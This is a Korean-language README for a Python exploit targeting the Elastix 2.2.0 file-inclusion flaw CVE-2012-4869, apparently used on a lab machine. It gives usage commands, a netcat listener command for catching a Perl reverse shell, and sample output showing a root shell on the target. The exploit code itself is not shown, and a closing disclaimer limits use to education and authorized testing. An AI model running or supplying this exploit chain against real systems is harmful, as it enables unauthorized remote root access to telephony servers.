
Elastix 2.2.0 LFI 취약점(CVE-2012-4869)을 위한 Python 익스플로잇 스크립트로, Perl 리버스 셸 페이로드 주입을 통한 원격 코드 실행을 가능하게 합니다.
이 스크립트는 Elastix 2.2.0의 로컬 파일 포함(LFI) 취약점을 이용하여 callme_page.php 엔드포인트를 통해 명령어를 주입함으로써 원격 코드 실행(RCE)을 가능하게 합니다. 이 익스플로잇은 CVE-2012-4869를 기반으로 합니다.
requests 모듈다음을 사용하여 종속성을 설치하십시오:
pip install requests
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001
익스플로잇을 실행하기 전에, 컴퓨터에서 Netcat 리스너를 시작하십시오:
nc -lvnp 9001
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001
[+] Exploit sent successfully, waiting for reverse shell...
[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)
이 익스플로잇은 교육 및 공인된 보안 테스트 목적으로만 사용됩니다. 무단 사용은 불법입니다. 저자는 이 도구의 오용에 대해 책임을 지지 않습니다.